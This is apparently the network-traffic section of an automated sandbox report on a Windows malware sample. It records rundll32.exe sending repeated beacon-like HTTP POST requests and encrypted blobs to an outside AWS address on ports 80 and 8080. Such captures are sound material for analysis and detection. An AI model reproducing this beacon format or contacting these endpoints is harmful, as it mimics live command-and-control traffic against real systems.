                            Jul 25, 2024 17:55:25.458076954 CEST4434972240.113.110.67192.168.2.6
                            Jul 25, 2024 17:55:25.458177090 CEST49722443192.168.2.640.113.110.67
                            Jul 25, 2024 17:55:25.458863974 CEST49722443192.168.2.640.113.110.67
                            Jul 25, 2024 17:55:25.458878040 CEST4434972240.113.110.67192.168.2.6
                            Jul 25, 2024 17:55:26.593583107 CEST4434972240.113.110.67192.168.2.6
                            Jul 25, 2024 17:55:26.593772888 CEST49722443192.168.2.640.113.110.67
                            Jul 25, 2024 17:55:26.595622063 CEST49722443192.168.2.640.113.110.67
                            Jul 25, 2024 17:55:26.595655918 CEST4434972240.113.110.67192.168.2.6
                            Jul 25, 2024 17:55:26.595918894 CEST4434972240.113.110.67192.168.2.6
                            Jul 25, 2024 17:55:26.597933054 CEST49722443192.168.2.640.113.110.67
                            Jul 25, 2024 17:55:26.598052025 CEST49722443192.168.2.640.113.110.67
                            Jul 25, 2024 17:55:26.598063946 CEST4434972240.113.110.67192.168.2.6
                            Jul 25, 2024 17:55:26.598223925 CEST49722443192.168.2.640.113.110.67
                            Jul 25, 2024 17:55:26.644507885 CEST4434972240.113.110.67192.168.2.6
                            Jul 25, 2024 17:55:26.788438082 CEST4434972240.113.110.67192.168.2.6
                            Jul 25, 2024 17:55:26.789216995 CEST49722443192.168.2.640.113.110.67
                            Jul 25, 2024 17:55:26.789297104 CEST4434972240.113.110.67192.168.2.6
                            Jul 25, 2024 17:55:26.789369106 CEST49722443192.168.2.640.113.110.67
                            Jul 25, 2024 17:55:26.789536953 CEST4434972240.113.110.67192.168.2.6
                            Jul 25, 2024 17:55:26.789623976 CEST49722443192.168.2.640.113.110.67
                            Jul 25, 2024 17:55:26.789680958 CEST49722443192.168.2.640.113.110.67
                            Jul 25, 2024 17:55:33.455132008 CEST804972152.90.110.169192.168.2.6
                            Jul 25, 2024 17:55:33.455482006 CEST4972180192.168.2.652.90.110.169
                            Jul 25, 2024 17:55:33.455589056 CEST4972180192.168.2.652.90.110.169
                            Jul 25, 2024 17:55:33.465553999 CEST804972152.90.110.169192.168.2.6
                            Jul 25, 2024 17:55:34.471539021 CEST4972380192.168.2.652.90.110.169
                            Jul 25, 2024 17:55:34.476825953 CEST804972352.90.110.169192.168.2.6
                            Jul 25, 2024 17:55:34.476921082 CEST4972380192.168.2.652.90.110.169
                            Jul 25, 2024 17:55:34.477086067 CEST4972380192.168.2.652.90.110.169
                            Jul 25, 2024 17:55:34.488125086 CEST804972352.90.110.169192.168.2.6
                            Jul 25, 2024 17:55:50.424643040 CEST4970480192.168.2.62.19.97.171
                            Jul 25, 2024 17:55:50.458551884 CEST80497042.19.97.171192.168.2.6
                            Jul 25, 2024 17:55:50.458667994 CEST4970480192.168.2.62.19.97.171
                            Jul 25, 2024 17:55:50.513789892 CEST4972380192.168.2.652.90.110.169
                            Jul 25, 2024 17:55:51.565897942 CEST497248080192.168.2.652.90.110.169
                            Jul 25, 2024 17:55:51.573383093 CEST80804972452.90.110.169192.168.2.6
                            Jul 25, 2024 17:55:51.576596022 CEST497248080192.168.2.652.90.110.169
                            Jul 25, 2024 17:55:51.576884985 CEST497248080192.168.2.652.90.110.169
                            Jul 25, 2024 17:55:51.581801891 CEST80804972452.90.110.169192.168.2.6
                            Jul 25, 2024 17:55:52.871532917 CEST49725443192.168.2.640.113.110.67
                            Jul 25, 2024 17:55:52.871598005 CEST4434972540.113.110.67192.168.2.6
                            Jul 25, 2024 17:55:52.871834040 CEST49725443192.168.2.640.113.110.67
                            Jul 25, 2024 17:55:52.872520924 CEST49725443192.168.2.640.113.110.67
                            Jul 25, 2024 17:55:52.872549057 CEST4434972540.113.110.67192.168.2.6
                            Jul 25, 2024 17:55:53.689729929 CEST4434972540.113.110.67192.168.2.6
                            Jul 25, 2024 17:55:53.689821959 CEST49725443192.168.2.640.113.110.67
                            Jul 25, 2024 17:55:53.691708088 CEST49725443192.168.2.640.113.110.67
                            Jul 25, 2024 17:55:53.691720009 CEST4434972540.113.110.67192.168.2.6
                            Jul 25, 2024 17:55:53.692012072 CEST4434972540.113.110.67192.168.2.6
                            Jul 25, 2024 17:55:53.703605890 CEST49725443192.168.2.640.113.110.67
                            Jul 25, 2024 17:55:53.703691959 CEST49725443192.168.2.640.113.110.67
                            Jul 25, 2024 17:55:53.703696966 CEST4434972540.113.110.67192.168.2.6
                            Jul 25, 2024 17:55:53.703846931 CEST49725443192.168.2.640.113.110.67
                            Jul 25, 2024 17:55:53.744491100 CEST4434972540.113.110.67192.168.2.6
                            Jul 25, 2024 17:55:53.892640114 CEST4434972540.113.110.67192.168.2.6
                            Jul 25, 2024 17:55:53.892719030 CEST4434972540.113.110.67192.168.2.6
                            Jul 25, 2024 17:55:53.893162966 CEST49725443192.168.2.640.113.110.67
                            Jul 25, 2024 17:55:53.893198013 CEST4434972540.113.110.67192.168.2.6
                            Jul 25, 2024 17:55:53.893205881 CEST49725443192.168.2.640.113.110.67
                            Jul 25, 2024 17:55:53.893213034 CEST4434972540.113.110.67192.168.2.6
                            Jul 25, 2024 17:55:53.893224001 CEST49725443192.168.2.640.113.110.67
                            Jul 25, 2024 17:56:12.946147919 CEST80804972452.90.110.169192.168.2.6
                            Jul 25, 2024 17:56:12.946253061 CEST497248080192.168.2.652.90.110.169
                            Jul 25, 2024 17:56:12.949676991 CEST497248080192.168.2.652.90.110.169
                            Jul 25, 2024 17:56:12.954898119 CEST80804972452.90.110.169192.168.2.6
                            Jul 25, 2024 17:56:14.977638960 CEST497268080192.168.2.652.90.110.169
                            Jul 25, 2024 17:56:14.988527060 CEST80804972652.90.110.169192.168.2.6
                            Jul 25, 2024 17:56:14.989790916 CEST497268080192.168.2.652.90.110.169
                            Jul 25, 2024 17:56:15.027879000 CEST497268080192.168.2.652.90.110.169
                            Jul 25, 2024 17:56:15.035418034 CEST80804972652.90.110.169192.168.2.6
                            Jul 25, 2024 17:56:21.433706999 CEST49727443192.168.2.640.113.110.67
                            Jul 25, 2024 17:56:21.433753014 CEST4434972740.113.110.67192.168.2.6
                            Jul 25, 2024 17:56:21.433811903 CEST49727443192.168.2.640.113.110.67
                            Jul 25, 2024 17:56:21.434535980 CEST49727443192.168.2.640.113.110.67
                            Jul 25, 2024 17:56:21.434552908 CEST4434972740.113.110.67192.168.2.6
                            Jul 25, 2024 17:56:22.567063093 CEST4434972740.113.110.67192.168.2.6
                            Jul 25, 2024 17:56:22.567321062 CEST49727443192.168.2.640.113.110.67
                            Jul 25, 2024 17:56:22.574461937 CEST49727443192.168.2.640.113.110.67
                            Jul 25, 2024 17:56:22.574481964 CEST4434972740.113.110.67192.168.2.6
                            Jul 25, 2024 17:56:22.574771881 CEST4434972740.113.110.67192.168.2.6
                            Jul 25, 2024 17:56:22.576752901 CEST49727443192.168.2.640.113.110.67
                            Jul 25, 2024 17:56:22.576829910 CEST49727443192.168.2.640.113.110.67
                            Jul 25, 2024 17:56:22.576834917 CEST4434972740.113.110.67192.168.2.6
                            Jul 25, 2024 17:56:22.576961994 CEST49727443192.168.2.640.113.110.67
                            Jul 25, 2024 17:56:22.620549917 CEST4434972740.113.110.67192.168.2.6
                            Jul 25, 2024 17:56:22.750425100 CEST4434972740.113.110.67192.168.2.6
                            Jul 25, 2024 17:56:22.750833035 CEST4434972740.113.110.67192.168.2.6
                            Jul 25, 2024 17:56:22.751246929 CEST49727443192.168.2.640.113.110.67
                            Jul 25, 2024 17:56:22.751312971 CEST4434972740.113.110.67192.168.2.6
                            Jul 25, 2024 17:56:22.751324892 CEST49727443192.168.2.640.113.110.67
                            Jul 25, 2024 17:56:22.751324892 CEST49727443192.168.2.640.113.110.67
                            Jul 25, 2024 17:56:22.751337051 CEST4434972740.113.110.67192.168.2.6
                            Jul 25, 2024 17:56:23.050139904 CEST497268080192.168.2.652.90.110.169
                            Jul 25, 2024 17:56:24.065493107 CEST497288080192.168.2.652.90.110.169
                            Jul 25, 2024 17:56:24.070488930 CEST80804972852.90.110.169192.168.2.6
                            Jul 25, 2024 17:56:24.070573092 CEST497288080192.168.2.652.90.110.169
                            Jul 25, 2024 17:56:24.070729971 CEST497288080192.168.2.652.90.110.169
                            Jul 25, 2024 17:56:24.075514078 CEST80804972852.90.110.169192.168.2.6
                            Jul 25, 2024 17:56:32.080676079 CEST497288080192.168.2.652.90.110.169
                            Jul 25, 2024 17:56:33.097110033 CEST497298080192.168.2.652.90.110.169
                            Jul 25, 2024 17:56:33.106733084 CEST80804972952.90.110.169192.168.2.6
                            Jul 25, 2024 17:56:33.110219955 CEST497298080192.168.2.652.90.110.169
                            Jul 25, 2024 17:56:33.110414028 CEST497298080192.168.2.652.90.110.169
                            Jul 25, 2024 17:56:33.116117954 CEST80804972952.90.110.169192.168.2.6
                            Jul 25, 2024 17:56:37.112000942 CEST497298080192.168.2.652.90.110.169
                            Jul 25, 2024 17:56:38.206617117 CEST4973080192.168.2.652.90.110.169
                            Jul 25, 2024 17:56:38.509855986 CEST804973052.90.110.169192.168.2.6
                            Jul 25, 2024 17:56:38.509924889 CEST4973080192.168.2.652.90.110.169
                            Jul 25, 2024 17:56:38.510205984 CEST4973080192.168.2.652.90.110.169
                            Jul 25, 2024 17:56:38.516333103 CEST804973052.90.110.169192.168.2.6
                            Jul 25, 2024 17:56:50.637783051 CEST49731443192.168.2.640.115.3.253
                            Jul 25, 2024 17:56:50.637823105 CEST4434973140.115.3.253192.168.2.6
                            Jul 25, 2024 17:56:50.637947083 CEST49731443192.168.2.640.115.3.253
                            Jul 25, 2024 17:56:50.638761044 CEST49731443192.168.2.640.115.3.253
                            Jul 25, 2024 17:56:50.638777971 CEST4434973140.115.3.253192.168.2.6
                            Jul 25, 2024 17:56:51.530021906 CEST4434973140.115.3.253192.168.2.6
                            Jul 25, 2024 17:56:51.530323029 CEST49731443192.168.2.640.115.3.253
                            Jul 25, 2024 17:56:51.532392979 CEST49731443192.168.2.640.115.3.253
                            Jul 25, 2024 17:56:51.532404900 CEST4434973140.115.3.253192.168.2.6
                            Jul 25, 2024 17:56:51.532783031 CEST4434973140.115.3.253192.168.2.6
                            Jul 25, 2024 17:56:51.534595966 CEST49731443192.168.2.640.115.3.253
                            Jul 25, 2024 17:56:51.534672022 CEST49731443192.168.2.640.115.3.253
                            Jul 25, 2024 17:56:51.534677982 CEST4434973140.115.3.253192.168.2.6
                            Jul 25, 2024 17:56:51.534815073 CEST49731443192.168.2.640.115.3.253
                            Jul 25, 2024 17:56:51.580492020 CEST4434973140.115.3.253192.168.2.6
                            Jul 25, 2024 17:56:51.737180948 CEST4434973140.115.3.253192.168.2.6
                            Jul 25, 2024 17:56:51.738842010 CEST49731443192.168.2.640.115.3.253
                            Jul 25, 2024 17:56:51.738871098 CEST4434973140.115.3.253192.168.2.6
                            Jul 25, 2024 17:56:51.738884926 CEST49731443192.168.2.640.115.3.253
                            Jul 25, 2024 17:56:51.738949060 CEST49731443192.168.2.640.115.3.253
                            Jul 25, 2024 17:56:59.947873116 CEST804973052.90.110.169192.168.2.6
                            Jul 25, 2024 17:56:59.948014975 CEST4973080192.168.2.652.90.110.169
                            Jul 25, 2024 17:56:59.948060989 CEST4973080192.168.2.652.90.110.169
                            Jul 25, 2024 17:56:59.953325033 CEST804973052.90.110.169192.168.2.6
                            Jul 25, 2024 17:57:01.977514982 CEST4973280192.168.2.652.90.110.169
                            Jul 25, 2024 17:57:01.982506037 CEST804973252.90.110.169192.168.2.6
                            Jul 25, 2024 17:57:01.982621908 CEST4973280192.168.2.652.90.110.169
                            Jul 25, 2024 17:57:01.982738972 CEST4973280192.168.2.652.90.110.169
                            Jul 25, 2024 17:57:01.987514019 CEST804973252.90.110.169192.168.2.6
                            Jul 25, 2024 17:57:05.987539053 CEST4973280192.168.2.652.90.110.169
                            Jul 25, 2024 17:57:07.008379936 CEST4973380192.168.2.652.90.110.169
                            Jul 25, 2024 17:57:07.013673067 CEST804973352.90.110.169192.168.2.6
                            Jul 25, 2024 17:57:07.013787031 CEST4973380192.168.2.652.90.110.169
                            Jul 25, 2024 17:57:07.014034986 CEST4973380192.168.2.652.90.110.169
                            Jul 25, 2024 17:57:07.019023895 CEST804973352.90.110.169192.168.2.6
                            Jul 25, 2024 17:57:11.023216009 CEST4973380192.168.2.652.90.110.169
                            Jul 25, 2024 17:57:12.039932966 CEST4973480192.168.2.652.90.110.169
                            Jul 25, 2024 17:57:12.045190096 CEST804973452.90.110.169192.168.2.6
                            Jul 25, 2024 17:57:12.045269012 CEST4973480192.168.2.652.90.110.169
                            Jul 25, 2024 17:57:12.045528889 CEST4973480192.168.2.652.90.110.169
                            Jul 25, 2024 17:57:12.050493956 CEST804973452.90.110.169192.168.2.6
                            Jul 25, 2024 17:57:16.369026899 CEST4973480192.168.2.652.90.110.169
                            Jul 25, 2024 17:57:17.565691948 CEST4973580192.168.2.652.90.110.169
                            Jul 25, 2024 17:57:17.572041035 CEST804973552.90.110.169192.168.2.6
                            Jul 25, 2024 17:57:17.572134972 CEST4973580192.168.2.652.90.110.169
                            Jul 25, 2024 17:57:17.572288990 CEST4973580192.168.2.652.90.110.169
                            Jul 25, 2024 17:57:17.577965021 CEST804973552.90.110.169192.168.2.6

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Jul 25, 2024 17:54:26.117017031 CEST5848553192.168.2.68.8.8.8
                            Jul 25, 2024 17:54:26.127499104 CEST53584858.8.8.8192.168.2.6

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Jul 25, 2024 17:54:26.117017031 CEST192.168.2.68.8.8.80x296eStandard query (0)ec2-52-90-110-169.compute-1.amazonaws.comA (IP address)IN (0x0001)false

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Jul 25, 2024 17:54:26.127499104 CEST8.8.8.8192.168.2.60x296eNo error (0)ec2-52-90-110-169.compute-1.amazonaws.com52.90.110.169A (IP address)IN (0x0001)false

                            HTTP Request Dependency Graph

                            • slscr.update.microsoft.com
                            • 52.90.110.169
                            • 52.90.110.169:8080

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.64971152.90.110.169802144C:\Windows\SysWOW64\rundll32.exe
                            TimestampBytes transferredDirectionData
                            Jul 25, 2024 17:54:26.153551102 CEST72OUTData Raw: 1c 31 eb 1f 02 ae 8f 4a 5c 0d 9f 9b e6 c2 e4 cd 26 78 fd c3 a5 4b b2 3b f7 c7 97 9b a7 96 d9 af f9 db b9 9c f3 e1 d6 59 27 c0 ab 6f 6c b2 18 0b 3f 90 98 c2 1f 6a 4a ac 87 32 3b f0 31 8f 73 67 56 5d e3 55 ff 35 9a af
                            Data Ascii: 1J\&xK;Y'ol?jJ2;1sgV]U5


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.64971852.90.110.169802144C:\Windows\SysWOW64\rundll32.exe
                            TimestampBytes transferredDirectionData
                            Jul 25, 2024 17:54:49.663119078 CEST258OUTPOST /update?id=d791f282 HTTP/1.1
                            Accept: */*
                            X-Session: 0
                            X-Status: 0
                            X-Size: 61456
                            X-Sn: 1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;
                            Host: 52.90.110.169
                            Content-Length: 0
                            Connection: Keep-Alive
                            Cache-Control: no-cache


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2192.168.2.64972152.90.110.169802144C:\Windows\SysWOW64\rundll32.exe
                            TimestampBytes transferredDirectionData
                            Jul 25, 2024 17:55:12.066039085 CEST258OUTPOST /update?id=36ebb732 HTTP/1.1
                            Accept: */*
                            X-Session: 0
                            X-Status: 0
                            X-Size: 61456
                            X-Sn: 1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;
                            Host: 52.90.110.169
                            Content-Length: 0
                            Connection: Keep-Alive
                            Cache-Control: no-cache


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            3192.168.2.64972352.90.110.169802144C:\Windows\SysWOW64\rundll32.exe
                            TimestampBytes transferredDirectionData
                            Jul 25, 2024 17:55:34.477086067 CEST258OUTPOST /update?id=8a8b3aa5 HTTP/1.1
                            Accept: */*
                            X-Session: 0
                            X-Status: 0
                            X-Size: 61456
                            X-Sn: 1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;
                            Host: 52.90.110.169
                            Content-Length: 0
                            Connection: Keep-Alive
                            Cache-Control: no-cache


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            4192.168.2.64972652.90.110.16980802144C:\Windows\SysWOW64\rundll32.exe
                            TimestampBytes transferredDirectionData
                            Jul 25, 2024 17:56:15.027879000 CEST263OUTPOST /update?id=dc53bbb9 HTTP/1.1
                            Accept: */*
                            X-Session: 0
                            X-Status: 0
                            X-Size: 61456
                            X-Sn: 1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;
                            Host: 52.90.110.169:8080
                            Content-Length: 0
                            Connection: Keep-Alive
                            Cache-Control: no-cache


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            5192.168.2.64972852.90.110.16980802144C:\Windows\SysWOW64\rundll32.exe
                            TimestampBytes transferredDirectionData
                            Jul 25, 2024 17:56:24.070729971 CEST263OUTPOST /update?id=71f3cbf7 HTTP/1.1
                            Accept: */*
                            X-Session: 0
                            X-Status: 0
                            X-Size: 61456
                            X-Sn: 1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;
                            Host: 52.90.110.169:8080
                            Content-Length: 0
                            Connection: Keep-Alive
                            Cache-Control: no-cache


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            6192.168.2.64972952.90.110.16980802144C:\Windows\SysWOW64\rundll32.exe
                            TimestampBytes transferredDirectionData
                            Jul 25, 2024 17:56:33.110414028 CEST263OUTPOST /update?id=01b63ea5 HTTP/1.1
                            Accept: */*
                            X-Session: 0
                            X-Status: 0
                            X-Size: 61456
                            X-Sn: 1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;
                            Host: 52.90.110.169:8080
                            Content-Length: 0
                            Connection: Keep-Alive
                            Cache-Control: no-cache


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            7192.168.2.64973052.90.110.169802144C:\Windows\SysWOW64\rundll32.exe
                            TimestampBytes transferredDirectionData
                            Jul 25, 2024 17:56:38.510205984 CEST70OUTData Raw: 88 d4 5c 25 2f 8e 05 9c ae e6 ef 35 f2 17 f2 19 7e 31 e1 ef cb fd 60 c6 87 b1 12 35 4f 2c 3e 67 65 6a 84 ee ef 84 d7 28 e0 a8 59 a7 c9 1a f8 7d 0d 06 a4 2b f2 00 c5 24 60 a6 26 60 13 f9 9a 52 10 91 11 ab 02 67
                            Data Ascii: \%/5~1`5O,>gej(Y}+$`&`Rg


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            8192.168.2.64973252.90.110.169802144C:\Windows\SysWOW64\rundll32.exe
                            TimestampBytes transferredDirectionData
                            Jul 25, 2024 17:57:01.982738972 CEST258OUTPOST /update?id=6171a2b6 HTTP/1.1
                            Accept: */*
                            X-Session: 0
                            X-Status: 0
                            X-Size: 61456
                            X-Sn: 1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;
                            Host: 52.90.110.169
                            Content-Length: 0
                            Connection: Keep-Alive
                            Cache-Control: no-cache


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            9192.168.2.64973352.90.110.169802144C:\Windows\SysWOW64\rundll32.exe
                            TimestampBytes transferredDirectionData
                            Jul 25, 2024 17:57:07.014034986 CEST258OUTPOST /update?id=592b1d5c HTTP/1.1
                            Accept: */*
                            X-Session: 0
                            X-Status: 0
                            X-Size: 61456
                            X-Sn: 1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;
                            Host: 52.90.110.169
                            Content-Length: 0
                            Connection: Keep-Alive
                            Cache-Control: no-cache


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            10192.168.2.64973452.90.110.169802144C:\Windows\SysWOW64\rundll32.exe
                            TimestampBytes transferredDirectionData
                            Jul 25, 2024 17:57:12.045528889 CEST258OUTPOST /update?id=7e9d30a3 HTTP/1.1
                            Accept: */*
                            X-Session: 0
                            X-Status: 0
                            X-Size: 61456
                            X-Sn: 1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;
                            Host: 52.90.110.169
                            Content-Length: 0
                            Connection: Keep-Alive
                            Cache-Control: no-cache


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            11192.168.2.64973552.90.110.169802144C:\Windows\SysWOW64\rundll32.exe
                            TimestampBytes transferredDirectionData
                            Jul 25, 2024 17:57:17.572288990 CEST20OUTData Raw: a1 1b 31 8b 6a 76 e9 a4 aa 7f 9c dd 02 a7 7c 07 4c fc 70 37
                            Data Ascii: 1jv|Lp7


                            HTTPS Proxied Packets

                            Session IDSource IPSource PortDestination IPDestination Port
                            0192.168.2.64971040.113.110.67443
                            TimestampBytes transferredDirectionData
                            2024-07-25 15:54:18 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 4b 39 65 6e 6f 36 68 70 4e 6b 47 49 37 6d 73 52 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 63 33 33 63 65 62 30 66 32 33 32 30 63 33 33 0d 0a 0d 0a
                            Data Ascii: CNT 1 CON 305MS-CV: K9eno6hpNkGI7msR.1Context: 9c33ceb0f2320c33
                            2024-07-25 15:54:18 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                            2024-07-25 15:54:18 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 4b 39 65 6e 6f 36 68 70 4e 6b 47 49 37 6d 73 52 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 63 33 33 63 65 62 30 66 32 33 32 30 63 33 33 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 63 42 32 5a 68 6b 70 56 44 68 71 43 58 4d 2f 41 68 63 67 6b 4f 78 43 54 4a 6a 45 46 75 64 67 4a 35 66 46 38 48 65 63 52 6e 2b 57 54 32 54 34 37 7a 6d 63 77 51 62 62 43 6c 37 39 34 57 41 42 48 71 72 45 5a 67 74 46 71 35 53 6e 50 68 74 4b 41 4a 51 4d 46 2b 79 57 64 4a 6c 50 64 76 72 6c 6d 5a 69 68 72 34 72 4f 37 4b 4e 62 62
                            Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: K9eno6hpNkGI7msR.2Context: 9c33ceb0f2320c33<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZcB2ZhkpVDhqCXM/AhcgkOxCTJjEFudgJ5fF8HecRn+WT2T47zmcwQbbCl794WABHqrEZgtFq5SnPhtKAJQMF+yWdJlPdvrlmZihr4rO7KNbb
                            2024-07-25 15:54:18 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 4b 39 65 6e 6f 36 68 70 4e 6b 47 49 37 6d 73 52 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 63 33 33 63 65 62 30 66 32 33 32 30 63 33 33 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: K9eno6hpNkGI7msR.3Context: 9c33ceb0f2320c33<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.64971040.113.110.674432144C:\Windows\SysWOW64\rundll32.exe
                            TimestampBytes transferredDirectionData
                            2024-07-25 15:54:18 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                            Data Ascii: 202 1 CON 58
                            2024-07-25 15:54:18 UTC58INData Raw: 4d 53 2d 43 56 3a 20 46 50 73 63 48 34 48 72 56 30 36 74 36 6b 4c 64 31 6d 4e 5a 57 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                            Data Ascii: MS-CV: FPscH4HrV06t6kLd1mNZWA.0Payload parsing failed.


                            Session IDSource IPSource PortDestination IPDestination Port
                            2192.168.2.64971240.113.110.67443
                            TimestampBytes transferredDirectionData
                            2024-07-25 15:54:27 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 37 37 57 4a 58 5a 34 4a 46 6b 65 6f 54 32 6c 67 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 66 30 35 65 66 65 39 61 38 39 39 62 63 34 34 0d 0a 0d 0a
                            Data Ascii: CNT 1 CON 305MS-CV: 77WJXZ4JFkeoT2lg.1Context: 7f05efe9a899bc44
                            2024-07-25 15:54:27 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
